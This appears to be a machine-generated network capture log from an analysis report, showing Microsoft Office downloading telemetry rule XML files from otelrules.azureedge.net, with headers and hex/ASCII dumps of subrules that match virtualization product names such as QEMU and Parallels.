                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        58192.168.2.54976713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:30 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142530Z-16547b76f7flf9g6hC1DFWmcx8000000097g00000000gq6r
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        59192.168.2.54976813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:30 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 44f8bb6f-a01e-001e-7911-3649ef000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142530Z-1749fc9bdbdjgplnhC1DFWhrks00000002cg00000000mgw1
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        60192.168.2.54976913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:30 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d980b71d-401e-000a-13a8-344a7b000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142530Z-1749fc9bdbd85qw2hC1DFW157000000002sg00000000akhu
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        61192.168.2.54977013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:31 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 2d5e3293-901e-002a-4f00-2d7a27000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142531Z-16547b76f7fcrtpchC1DFW52e80000000krg00000000hdtf
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        62192.168.2.54977113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:31 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142531Z-16547b76f7fj897nhC1DFWdwq40000000kh000000000h1ar
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        63192.168.2.54977213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:31 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 806b7f82-201e-0003-669a-36f85a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142531Z-16547b76f7fj5p7mhC1DFWf8w40000000kx0000000008qz7
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        64192.168.2.54977313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:31 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: ed171e7d-901e-0015-69a2-34b284000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142531Z-1749fc9bdbd2jxtthC1DFWfk5w00000002fg00000000ga01
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        65192.168.2.54977413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:31 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: da73b1ea-a01e-0070-5573-35573b000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142531Z-1749fc9bdbdns7kfhC1DFWb6c400000002q000000000dc1x
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:31 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


